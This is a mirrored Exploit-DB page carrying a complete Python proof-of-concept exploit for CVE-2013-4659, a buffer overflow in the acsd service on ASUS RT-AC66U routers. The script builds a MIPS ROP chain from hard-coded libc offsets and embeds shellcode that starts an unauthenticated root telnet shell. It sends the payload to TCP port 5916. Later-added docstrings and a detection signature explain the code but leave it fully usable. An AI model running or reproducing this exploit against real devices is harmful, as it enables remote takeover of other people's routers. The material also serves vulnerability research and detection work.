ASUS RT-AC66U – ‘acsd’ Remote Command Execution

  • 作者: Jacob Holcomb
    日期: 2013-07-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/27133/
  • #!/usr/bin/env python
    
    import signal, struct
    from time import sleep
    from socket import *
    from sys import exit, exc_info
    
    #
    # Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
    # Discovered and Reported*June 2013 
    # Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
    #*Security Analysts @ Independent Security Evaluators
    # Software Vendor*********http://asus.com
    # Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/
    # Software****************acsd wireless service (Listens on TCP/5916)
    # Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) 
    # CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
    #
    # Overview:
    #	The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple 
    # Buffer Overflow attacks.
    #
    # Multiple overflows exist in the following software:
    #
    #	- Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)
    #														
    
    
    def sigHandle(signum, frm): # Signal handler
        """SIGINT handler: announce cleanup, pause briefly, then exit with status 0.

        Installed by main() through signal.signal(); the two positional
        arguments are the ones the signal module passes and are not used.
        Calls sys.exit(0), i.e. raises SystemExit(0).
        """
        cleanup_msg = "\n[!!!] Cleaning up the exploit... [!!!]\n"
        print cleanup_msg
        sleep(1)  # short pause so the message is visible before the process ends
        exit(0)
    
    
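    def targServer():
        """Prompt on stdin until a syntactically valid IPv4 address is entered.

        Returns the address in dotted-quad form, normalised by an
        inet_aton()/inet_ntoa() round trip.

        Only errors that mean "not a valid address" are caught: socket.error
        (available here as the star-imported name ``error``) from inet_aton()
        and ValueError.  The original bare ``except:`` also swallowed the
        SystemExit raised by the SIGINT handler and EOFError on a closed
        stdin, which made the prompt impossible to leave; those now propagate.
        """
        prompt = "\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"
        while True:
            try:
                packed = inet_aton(raw_input(prompt))
            except (error, ValueError):  # ``error`` is socket.error via ``from socket import *``
                print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
                sleep(1)
                continue
            return inet_ntoa(packed)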
    
    
    def main():
        """Interactive driver for this acsd overflow proof of concept.

        Prints the banner, installs sigHandle for SIGINT, asks for the router
        address via targServer(), assembles the oversized "autochannel&param="
        request and sends it once to TCP/5916, then closes the socket.  Nothing
        is read back, so the script cannot tell whether the request did
        anything (hence the "Fingers crossed" message).

        All addresses below are fixed for one build -- libc at 0x2ab25000 under
        firmware 3.0.0.4.266 per the file header -- and the request is sent
        without any version check, so on another build the hard-coded offsets
        simply do not line up.

        Detection note: the request is plaintext and begins with
        "autochannel&param=" followed by 510 bytes of 0x42 ("B"); a request on
        TCP/5916 of roughly 720 bytes with that prefix is a usable signature
        for this PoC.
        """
        print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
 [*] Discovered and Reported: June 2013
 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
 [*] Software Vendor: http://asus.com
 [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
 [*] Software: acsd wireless service (Listens on TCP/5916)
 [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
 [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")
        signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
        victim = targServer()
        port = int(5916)  # acsd listens on TCP/5916 (see header)
        acsdCmd = "autochannel&param=" #Vulnerable command - JH

        # base address of .text section of libc.so.0 in acsd's address space
        # (build-specific: from firmware 3.0.0.4.266, see header)
        libc_base = 0x2ab25000

        # Every chain entry below is packed as a 32-bit little-endian word ("<L").

        # ROP gadget #1
        # lui s0,0x2
        # li a0,1
        # move t9,s1
        # jalr t9
        # ori a1,s0,0x2
        ra1 = struct.pack("<L", libc_base + 0x2d39c)

        # ROP gadget #2
        # move t9,s3
        # lw ra,44(sp)
        # lw s4,40(sp)
        # lw s3,36(sp)
        # lw s2,32(sp)
        # lw s1,28(sp)
        # lw s0,24(sp)
        # jr t9
        s1 = struct.pack("<L", libc_base + 0x34358)

        # sleep() - used to force program context switch (cache flush)
        s3 = struct.pack("<L", libc_base + 0x2cb90)

        # ROP gadget #3
        # addiu a1,sp,24
        # lw gp,16(sp)
        # lw ra,32(sp)
        # jr ra
        # addiu sp,sp,40
        ra2 = struct.pack("<L", libc_base + 0xa1b0)

        # ROP gadget #4
        # move t9,a1
        # addiu a0,a0,56
        # jr t9
        # move a1,a2
        ra3 = struct.pack("<L", libc_base + 0x3167c)

        # jalr sp
        jalr_sp ="\x09\xf8\xa0\x03"

        # filler; slices of it are reused as padding between the chain entries below
        JuNk = "\x42" * 510
        # 4-byte filler placed before the shellcode; the name suggests a
        # NOP-like word -- not verified here
        safeNop = "2Aa3"

        #80 Bytes system() Shellcode by Jacob Holcomb of ISE
        #Calling system() and executing telnetd -l /bin/sh
        shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
        shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
        shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
        shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
        shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
        shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
        shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
        shellcode += "\x41\x61\x33"

        # Request layout: command prefix, filler, then the chain entries and
        # the shellcode in the order the comments above describe.
        sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
        sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
        sploit += safeNop + shellcode

        # NOTE(review): the bare except clauses below also catch the SystemExit
        # raised by sigHandle, so Ctrl-C while inside one of these try bodies is
        # reported as an error instead of running the handler's cleanup path.
        try:
            print "\n [*] Creating network socket."
            net_sock = socket(AF_INET, SOCK_STREAM)
        except:
            print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
            sleep(1)
            exit(0)

        try:
            print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
            net_sock.connect((victim, port))
        except:
            print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
            sleep(1)
            exit(0)

        try:
            print """ [*] Attempting to exploit the acsd param command.
 [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
 [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
            net_sock.send(sploit)
            sleep(1)
        except:
            print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
            sleep(1)
            exit(0)

        # No response is read: the script closes the socket right after sending.
        try:
            print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
 [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
            net_sock.close()
        except:
            print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
            sleep(1)
            exit(0)
    
    
    # Script entry point: only runs when executed directly, not on import.
    if __name__ == "__main__":
        main()